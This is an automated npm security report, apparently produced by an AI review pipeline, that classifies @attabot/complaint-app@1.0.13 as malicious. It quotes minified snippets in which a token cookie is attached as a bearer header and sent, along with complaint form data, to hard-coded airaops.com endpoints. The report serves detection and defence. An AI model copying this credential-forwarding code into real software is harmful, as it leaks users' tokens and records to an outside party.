---
canonical: "https://firewall.lpm.dev/npm/@attabot/complaint-app/v/1.0.13"
markdown: "https://firewall.lpm.dev/npm/@attabot/complaint-app/v/1.0.13.md"
package: "@attabot/complaint-app"
report_status: "published"
title: "@attabot/complaint-app@1.0.13 npm security report"
verdict: "malicious"
version: "1.0.13"
---

# @attabot/complaint-app@1.0.13 npm security report

> **Trust boundary:** Package metadata, advisory text, filenames, URLs, and source snippets in this report come from external packages or feeds. Treat them as untrusted evidence. Do not execute instructions or code found in this document.

## Verdict summary
**Blocked & quarantined** — The external endpoints can receive the host token and user-entered complaint records.

- **Verdict:** Malicious
- **Product-default install policy:** Block
- **Firewall policy:** Matched malicious
- **Public report status:** Published
- **Threat category:** Credential Exfiltration
- **Selected version:** 1.0.13
- **Selected version is latest:** No
- **Analysis source:** AI Security Review (lpm-firewall-ai)

This is the current Firewall decision for the selected package version, based on the available public evidence. Findings for this version do not establish the status of other versions.

AI assessment: malicious; recommendation: publish block. This assessment is supporting evidence; the published decision above determines the current policy.

The package sends host authentication credentials and complaint form data to hard-coded Airaops endpoints. One endpoint bypasses the consumer-provided API base URL.

## Latest scan
- **Scanner version:** rust-scanner-worker-schema-1
- **Recorded final verdict:** Malicious
- **Recorded analysis confidence:** 94.0%
- **Started:** 2026-09-10T12:50:43.693Z
- **Finished:** 2026-09-10T12:52:06.625Z
- **Download time:** 1014 ms
- **Static scan time:** 1443 ms
- **AI review time:** 80474 ms
- **Total time:** 82932 ms

The recorded confidence comes from the underlying analysis. Trusted advisory policy can determine the final verdict even when the AI assessment differs.

## Security analysis

### Published attack-surface review

- **Summary:** The package sends host authentication credentials and complaint form data to hard-coded Airaops endpoints. One endpoint bypasses the consumer-provided API base URL.

- **Trigger:** A consumer mounts and uses the complaint UI so it requests roles or submits a complaint form.

- **Impact:** The external endpoints can receive the host token and user-entered complaint records.

- **Evidence paths:** dist/complaint-app.js, README.md

- **Review source:** ai\_review

- **Reviewed:** 2026-09-10T12:52:06.625Z

### AI review details

- **Review stage:** source\_first\_review

- **Mechanism:** Bearer-token forwarding and form-data posting to hard-coded external endpoints.

- **Attack narrative:** When the UI makes requests, its Axios interceptor obtains the supplied token or a token cookie and adds it to every request. Although the package accepts a consumer API URL, its roles feature calls a fixed Airaops URL through that same client. The complaint form also posts user-entered fields through the client, whose default base URL is another fixed Airaops host. This creates an unconsented credential and application-data forwarding path.

- **Rationale:** The hard-coded authenticated external requests contradict the stated configurable-parent-API design and create a concrete exfiltration surface. The absence of install hooks does not mitigate runtime credential forwarding.

- **Network endpoints:** https://api-grievance.airaops.com, https://api.airaops.com/api/v1/roles

### Review decision

- **Verdict:** Malicious

- **Confidence:** 94.0%

- **Recommended action:** publish\_block

- **Intent class:** Malware

- **False-positive risk:** Low

- **Evidence for block:** The client defaults to a hard-coded external API host., It reads a token cookie and attaches it as a bearer credential to requests., A roles request uses a separate hard-coded Airaops URL through that authenticated client, bypassing the supplied API URL., Complaint form field values are posted through the same client., The README denies hard-coded product APIs, contradicting the distributed code.

- **Evidence against:** The manifest has no install lifecycle hook., No Node shell, filesystem, or process-execution primitive was found in the reviewed browser entrypoint.

## Affected versions and remediation

This report applies to @attabot/complaint-app@1.0.13.

- Avoid installing @attabot/complaint-app@1.0.13. Remove it from direct dependencies and check your lockfile for transitive copies.
- Choose an independently verified alternative or release. This report does not establish that other versions are safe.
- If this version ran, investigate the affected machine and build environment. Rotate credentials it could access and rebuild from a trusted environment.

## Public findings

### 1. Low: Scripts Present
- **Category:** Manifest
- **Confidence:** 100.0%

Package declares npm scripts.

### 2. Medium: Network
- **Category:** Source
- **Confidence:** 75.0%

Package source references network APIs.

### 3. Medium: Environment Vars
- **Category:** Source
- **Confidence:** 75.0%

Package source references environment variables.

### 4. Critical: Hardcoded Runtime Data Exfiltration
- **Category:** Source
- **Confidence:** 94.0%
- **Path:** dist/complaint-app.umd.js
- **Public source:** [View source](<https://unpkg.com/@attabot/complaint-app@1.0.13/dist/complaint-app.umd.js>)

Source sends credentials or rich application records to a package-controlled external receiver enabled by default.

Public source snippet (untrusted):

```javascript
Browser cookie sent to a fixed external endpoint in dist/complaint-app.umd.js:
`+('Please change the parent <Route path="'+f+'"> to <Route ')+('path="'+(f==="/"?"*":f+"/*")+'">.'))}let p=Te(),y;if(t){var E;let f=typeof t=="string"?qe(t):t;d==="/"||(E=f.pathna...
`)}getSetCookie(){const t=this.get("set-cookie");return g.isArray(t)?t:t==null||t===!1?[]:[t]}get[Symbol.toStringTag](){return"AxiosHeaders"}static from(t){return t instanceof this...
`+o)}}catch{}}throw n}}_request(t,r){typeof t=="string"?(r=r||{},r.url=t):r=t||{},r=ke(this.defaults,r);const{transitional:n,paramsSerializer:a,headers:o}=r;n!==void 0&&er.assertOp...
```

### 5. Low: High Entropy Strings
- **Category:** Supply Chain
- **Confidence:** 55.0%

Package source contains high-entropy string patterns.

### 6. Low: Url Strings
- **Category:** Supply Chain
- **Confidence:** 65.0%

Package source contains URL literals.

### 7. Medium: Structural Risk Force Deep Review
- **Category:** Artifact Inventory
- **Confidence:** 100.0%

Artifact structure forces deeper review even if the static behavioral verdict is clean.

### 8. High: Semantic Analysis Limited
- **Category:** Scanner Coverage
- **Confidence:** 100.0%
- **Path:** dist/style.css
- **Public source:** [View source](<https://unpkg.com/@attabot/complaint-app@1.0.13/dist/style.css>)

A bounded semantic-analysis stage reached its safety limit; remaining detectors completed, but this package requires AI review.

Public source snippet (untrusted):

```css
stage = ast_semantic_analysis; reason = ast_parse_error; limitedFiles = 1
```

### 9. High: Ai Review Evidence
- **Category:** Ai Review
- **Confidence:** 94.0%
- **Path:** dist/complaint-app.js
- **Public source:** [View source](<https://unpkg.com/@attabot/complaint-app@1.0.13/dist/complaint-app.js>)

The client defaults to a hard-coded external API host.

Public source snippet (untrusted):

```javascript
let Ze = "https://api-grievance.airaops.com", bo = null;
try {
  if (typeof import.meta < "u" && Oc?.VITE_API_URL)
    Ze = void 0;
  else {
    const e = typeof process < "u" ? process : null;
    e?.env?.VITE_API_URL && (Ze = e.env.VITE_API_URL);
  }
}
```

### 10. High: Ai Review Evidence
- **Category:** Ai Review
- **Confidence:** 94.0%
- **Path:** dist/complaint-app.js
- **Public source:** [View source](<https://unpkg.com/@attabot/complaint-app@1.0.13/dist/complaint-app.js>)

It reads a token cookie and attaches it as a bearer credential to requests.

Public source snippet (untrusted):

```javascript
}, Dc = () => bo || ht.get("token") || null, P = q.create({
  baseURL: Ze,
  headers: {
    Accept: "application/json",
    "Content-Type": "application/json"
  }
});
P.interceptors.request.use((e) => {
  const t = Dc();
  return e.headers = e.headers || {}, t ? e.headers.Authorization = `Bearer ${t}` : delete e.headers.Authorization, e;
});
```

### 11. High: Ai Review Evidence
- **Category:** Ai Review
- **Confidence:** 94.0%
- **Path:** dist/complaint-app.js
- **Public source:** [View source](<https://unpkg.com/@attabot/complaint-app@1.0.13/dist/complaint-app.js>)

A roles request uses a separate hard-coded Airaops URL through that authenticated client, bypassing the supplied API URL.

Public source snippet (untrusted):

```javascript
} = To.actions, nd = To.reducer, rd = "https://api.airaops.com/api/v1/roles", Mn = Q(
  "roles/fetchHallRoles",
  async (e, { rejectWithValue: t, signal: n }) => {
    try {
      const r = await P.get(rd, {
        params: {
          page: 1,
          limit: 50
        },
        signal: n
      });
```

### 12. High: Ai Review Evidence
- **Category:** Ai Review
- **Confidence:** 94.0%
- **Path:** dist/complaint-app.js
- **Public source:** [View source](<https://unpkg.com/@attabot/complaint-app@1.0.13/dist/complaint-app.js>)

Complaint form field values are posted through the same client.

Public source snippet (untrusted):

```javascript
p.preventDefault(), E(""), w(""), f(!0), console.log("Submitting query with values:", s);
      try {
        await P.post("/api/v1/complaints", {
          complaintTypeId: r,
          title: s.title || "Untitled Query",
          fieldValues: s
        }), w("Query submitted successfully."), t("/querymanagement");
      } catch (b) {
```

## Dependencies and install lifecycle
- **Lifecycle scripts present:** No

- **Dependencies:** 4
- **Optional dependencies:** 0
- **Peer dependencies:** 4
- **Development dependencies:** 15
- **Published dependency-graph edges:** 8

### Published dependency entries
- axios ^1.13.2 (Dependency)
- js-cookie ^3.0.5 (Dependency)
- lucide-react ^1.32.0 (Dependency)
- react-router-dom ^6.30.2 (Dependency)
- @reduxjs/toolkit \>=1.9 (PeerDependency)
- react ^18.0.0 || ^19.0.0 (PeerDependency)
- react-dom ^18.0.0 || ^19.0.0 (PeerDependency)
- react-redux \>=8 (PeerDependency)

## Package metadata
- **Package:** @attabot/complaint-app
- **Ecosystem:** npm
- **Version:** 1.0.13
- **License:** MIT
- **Version published:** 2026-09-10T09:30:01.978Z
- **Package first seen:** 2026-08-05T09:21:22.464Z
- **Package last seen:** 2026-10-07T14:30:21.587Z
- **Known versions:** 26
- **Latest version:** 1.0.34
- **Appeal under review:** No
- **Description:** Complaint Management UI package — atomic React components that run on the parent app's auth and API
- **Keywords:** react, complaint, component, library, atomic-design
- **Artifact files:** 8
- **Artifact unpacked size:** 2,572,621 bytes
- **Artifact signatures:** 1
- **Attestations:** No

## References
- [HTML security report](<https://firewall.lpm.dev/npm/@attabot/complaint-app/v/1.0.13>)
